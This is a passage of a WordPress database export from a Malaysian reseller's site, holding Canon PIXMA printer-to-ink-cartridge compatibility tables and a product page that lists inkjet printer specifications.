width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 17:22:03','2019-09-24 09:22:03','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3317,1,'2019-09-25 08:32:00','2019-09-25 00:32:00','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" 